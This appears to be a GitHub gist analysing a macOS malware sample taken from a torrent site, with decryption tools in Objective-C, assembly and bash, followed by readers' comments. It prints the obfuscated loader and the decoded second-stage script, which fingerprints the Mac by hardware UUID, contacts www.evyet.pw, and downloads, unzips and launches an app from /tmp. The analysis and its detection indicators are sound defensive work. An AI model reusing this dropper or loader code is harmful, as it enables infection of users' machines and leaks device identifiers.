@xfbs
Last active September 28, 2022 16:17
Decrypted bash file of macOS malware downloaded from mac-torrents.io
// file: decrypt.m
// "decrypts" a single base64-encoded string from a shitty macos malware.
// compile with: clang -o decrypt -framework Foundation decrypt.m
#import <Foundation/Foundation.h>
#include <stdint.h>
#include <stdio.h>
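int main (int argc, const char * argv[]) {
    // Usage: decrypt <base64-string>
    //
    // Reverses the malware's string obfuscation: base64-decode the argument,
    // then XOR each byte with a 3-byte key indexed by (i / 2) % 3, i.e. every
    // key byte covers two consecutive plaintext bytes (cf. decrypt_loop.asm,
    // where the same index is computed as an even word offset).
    // Diagnostics and the result go to NSLog (stderr).
    // Returns 0 on success, 1 on a missing or undecodable argument.
    @autoreleasepool {
        // argv[1] was used unchecked; stringWithUTF8String: raises on NULL.
        if (argc < 2 || argv[1] == NULL) {
            fprintf(stderr, "usage: %s <base64-string>\n", argv[0]);
            return 1;
        }
        NSString *string = [NSString stringWithUTF8String:argv[1]];
        if (string == nil) {
            fprintf(stderr, "argument is not valid UTF-8\n");
            return 1;
        }
        NSData *data = [[NSData alloc] initWithBase64EncodedString:string
                                                           options:NSDataBase64DecodingIgnoreUnknownCharacters];
        if (data == nil) {
            fprintf(stderr, "argument is not valid base64\n");
            return 1;
        }
        NSLog(@"length = %lu", (unsigned long)data.length);

        // Work on the raw decoded bytes instead of re-decoding them as an
        // ASCII NSString: that decode returned nil for any byte >= 0x80 and
        // the tool then silently printed an empty result. For pure-ASCII
        // input the output is identical to the original.
        const uint8_t *bytes = data.bytes;
        static const uint8_t key[] = {'b', 'i', 'u'};
        const NSUInteger keyLength = sizeof(key) / sizeof(key[0]);
        NSMutableString *out = [[NSMutableString alloc] initWithCapacity:data.length];
        for (NSUInteger i = 0; i < data.length; i++) {
            // key index advances every two bytes
            unichar processed = (unichar)(bytes[i] ^ key[(i / 2) % keyLength]);
            [out appendFormat:@"%C", processed];
        }
        NSLog(@"%@", out);
    }
    return 0;
}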
; file: decrypt_loop.asm
; runs the loop in the decrypt method of the malware and prints out
; contents of the rcx register.
; compile with: nasm -f macho64 decrypt_loop.asm
; link with: ld -macosx_version_min 10.7.0 -lSystem -o decrypt_loop decrypt_loop.o
global start
section .text
start:
; r12 holds i, the byte index into the ciphertext; it starts at 0
; (writing r12d zero-extends the full register).
xor r12d, r12d
loop:
mov eax, r12d ; XREF=+[Utilities decrypt:]+419
; 0xaaaaaaab is the multiply-by-reciprocal constant compilers emit for an
; unsigned divide by 3; combined with the shift by 34 (0x22) below this
; appears to compute rax = i / 6 for 32-bit i.
mov ecx, 0xaaaaaaab
imul rax, rcx
shr rax, 0x22
; ebx = 3 * (i / 6), then doubled: ebx = 6 * (i / 6)
lea ebx, [rax+rax*2]
add ebx, ebx
; stand-in for the ciphertext byte load; unused here because the xor below is
; commented out.
mov rax, 10 ; fake get byte
; ecx = i - 6 * (i / 6) = i % 6; clearing bit 0 yields 2 * ((i / 2) % 3),
; an even (word) offset into a three-entry key, matching key[(i / 2) % 3]
; in decrypt.m.
mov ecx, r12d
sub ecx, ebx
and ecx, 0xfffffffe
; xor ax, word [ss:rbp+rcx]
; print offset
; write(1, rsp, 1): rcx is pushed and only its low byte (little-endian) is
; emitted per iteration.
push rcx
mov rax, 0x2000004 ; write
mov rdi, 1 ; stdout
mov rsi, rsp
mov rdx, 1
syscall
pop rcx
inc r12
; unconditional: the exit sequence below is never reached, so this harness
; runs until killed.
jmp loop
mov rax, 0x2000001 ; exit
mov rdi, 0
syscall
section .data
; not referenced by the code above
data: db "0", 2
#!/bin/bash
_l() {
# _l HEXDATA HEXKEY [RESULT_VAR]
# XORs HEXDATA with HEXKEY one byte (two hex digits) at a time, wrapping the
# key when its end is reached, and appends the lowercase hex result to
# __return_var. With a third argument the result is assigned to that variable
# via eval; otherwise it is echoed without a trailing newline.
# NOTE(review): _i, _x and __return_var are globals and __return_var is never
# reset, so repeated calls in the same shell accumulate output.
_i=0;_x=0;
# _i walks the data, _x walks the key, both two hex digits per step
for ((_i=0; _i<${#1}; _i+=2)) do
__return_var="$__return_var$(printf "%02x" $(( ((0x${1:$_i:2})) ^ ((0x${2:$_x:2})) )) )"
# wrap the key offset back to 0 at the end of the key
if (( (_x+=2)>=${#2} )); then ((_x=0)); fi
done
if [[ "$3" ]]; then eval "$3='$__return_var'"; else echo -n "$__return_var"; fi
}
_m() {
# _m BASE64DATA KEY [RESULT_VAR]
# base64-decodes $1 (the decoded text is itself a hex string, since _l reads it
# as 0x.. pairs), hex-encodes the key $2 with xxd -pu, XORs the two with _l and
# turns the hex result back into bytes with xxd -r -p.
# Note that printf "$1" / printf "$2" use the arguments as printf format
# strings, so any % or \ in them would be interpreted.
_v=$(base64 --decode <(printf "$1"));_k=$(xxd -pu <(printf "$2"));
__return_var="$(xxd -r -p <(_l "$_v" "$_k"))"
if [[ "$3" ]]; then eval "$3='$__return_var'"; else echo -n "$__return_var"; fi
}
# XOR key for the payload; the same value reappears as ENC_PASS in the decoded
# stage.
_y="2822812613"
# base64-encoded, XOR-obfuscated second stage (placeholder in this copy).
_t="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"
# Decodes and immediately executes the second stage. When analysing, print the
# decoded text (e.g. _m "$_t" "$_y" on its own) instead of passing it to eval.
eval "$(_m "$_t" "$_y")"
#!/bin/bash
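process() {
    # process HEXDATA HEXKEY
    # XORs HEXDATA with HEXKEY one byte (two hex digits) at a time, wrapping
    # the key around when its end is reached, and prints the result as
    # lowercase hex without a trailing newline. Returns 1 if the key is empty
    # (the arithmetic would otherwise fail on an empty 0x literal).
    #
    # All state is local: the original left i, x and result as globals and
    # never reset result, so a second call in the same shell appended to the
    # previous result.
    local data="$1"
    local key="$2"
    local i=0
    local x=0
    local result=""
    if [[ -z "$key" ]]; then
        return 1
    fi
    # i is the current position in the data, x the current position in the key
    for ((i=0; i<${#data}; i+=2)) do
        result="$result$(printf '%02x' $(( 0x${data:$i:2} ^ 0x${key:$x:2} )))"
        # wrap key around when end is reached.
        if (( (x+=2)>=${#key} )); then
            x=0
        fi
    done
    # output result (printf rather than echo -n so no option parsing applies).
    printf '%s' "$result"
}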
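decode() {
    # decode BASE64DATA KEY
    # Reverses the loader's string obfuscation: base64-decode DATA (which
    # yields a hex string), hex-encode KEY with xxd -pu, XOR the two with
    # process, and turn the resulting hex back into bytes. The decoded bytes
    # are written to stdout unchanged. Returns 1 if DATA is not valid base64.
    local data="$1"
    local key="$2"
    local decoded key_hex
    # printf '%s' so that % or \ sequences in the arguments are not treated as
    # a printf format string (the original used printf "$1").
    decoded=$(base64 --decode <(printf '%s' "$data")) || return 1
    # xxd -pu outputs a stream of upper-case hex characters; bash's 0x..
    # parsing accepts either case.
    # NOTE(review): xxd -p wraps long output onto several lines; fine for the
    # short keys used here — confirm before reusing with longer keys.
    key_hex=$(xxd -pu <(printf '%s' "$key"))
    # Pass the bytes through as-is: the original's echo "$(...)" stripped
    # trailing newlines from the payload and appended one of its own.
    xxd -r -p <(process "$decoded" "$key_hex")
}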
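# XOR key for the payload; the same value reappears as ENC_PASS in the decoded
# stage.
key="2822812613"
# base64-encoded, XOR-obfuscated second stage (placeholder in this copy).
data="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"
# The loader ran eval "$(decode ...)", i.e. executed whatever the payload
# decoded to. For analysis the decoded stage is written to stdout instead, so
# it can be read and compared without running it.
decode "$data" "$key"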
#!/bin/bash
# Decoded second stage, annotated for analysis. Indicators useful for
# detection: the host and path below, the query parameters reported to it,
# and the mktemp -> curl -> unzip -P -> chmod +x -> open sequence under /tmp.
# Same value as the first stage's XOR key; also sent to the server as p=.
ENC_PASS="2822812613"
# Download host and path (indicators).
APP_DOMAIN="www.evyet.pw"
APP_ROUTE="download/dlst"
# Password for the downloaded zip archive.
unzip_password="316218228228228126133456789"
# Reported as o=.
os_version="$(sw_vers -productVersion)"
# Fresh per run; reported as s= and passed on to the dropped app.
session_guid="$(uuidgen)"
# Hardware UUID (IOPlatformUUID) of the machine, reported as mid=.
# ioreg -r prints the subtree rooted at the matched object, -d1 limits the
# depth to one level, -c selects the IOPlatformExpertDevice class; the sed
# extracts the quoted value and tr strips anything non-printable.
machine_id="$(echo -n "$(ioreg -rd1 -c IOPlatformExpertDevice | grep -o '"IOPlatformUUID" = "\(.*\)"' | sed -E -n 's@.*"([^"]+)"@\1@p')" | tr -dc '[[:print:]]')"
# Plain-HTTP request carrying machine id, session id, OS version and ENC_PASS.
url="http://${APP_DOMAIN}/${APP_ROUTE}?mid=${machine_id}&s=${session_guid}&o=${os_version}&p=${ENC_PASS}"
# Download target in /tmp.
tmp_path="$(mktemp /tmp/XXXXXXXXX)"
# -f: fail silently on HTTP errors, -0: HTTP/1.0, -L: follow redirects.
# Redirections apply left to right: stdout and stderr go to /dev/null, then
# stdout is re-targeted to append to tmp_path, so the body lands in tmp_path
# and stderr is discarded.
curl -f0L "${url}" >/dev/null 2>&1 >> ${tmp_path}
# Extraction directory in /tmp (trailing slash is relied on below).
app_dir="$(mktemp -d /tmp/XXXXXXXX)/"
unzip -P "${unzip_password}" "${tmp_path}" -d "${app_dir}" > /dev/null 2>&1
# The archive is deleted; only the extracted contents remain on disk.
rm -f ${tmp_path}
# NOTE(review): "*.app" is a basic regex in which a leading * is literal, so
# this appears to select the first entry of the extraction dir rather than
# exclude .app bundles — verify against a sample archive.
file_name="$(grep -m1 -v "*.app" <(ls -1 "${app_dir}"))"
# Mounted volume the script was started from (a /Volumes/... path), with
# spaces URL-encoded; empty when not run from /Volumes.
volume_name="$(echo -n "${PWD}" | sed -E -n 's@^(/Volumes/[^/]+)/.*@\1@p')"
volume_name="${volume_name// /%20}"
# Marks every file in the extracted bundle's MacOS directory executable.
chmod +x "${app_dir}${file_name}/Contents/MacOS"/*
# Launches the extracted app, passing the session id and source volume.
open -a "${app_dir}${file_name}" --args "s" "${session_guid}" "${volume_name}"
@nominalista

Hi Patrick, I have found your gist very interesting, can you explain a little bit more what's happening here?

@OngLL

OngLL commented Jul 22, 2020

Have you performed analysis of the binary? Your blog page has only part 1.

@xfbs

xfbs commented Jul 22, 2020

@OngLL yep, I never got around to publishing the second part unfortunately. We loaded it into Hopper and Ghidra, to be honest I don't really remember how far we got.

@ynjiya

ynjiya commented Sep 28, 2022

what does -rd1 do in ioreg?
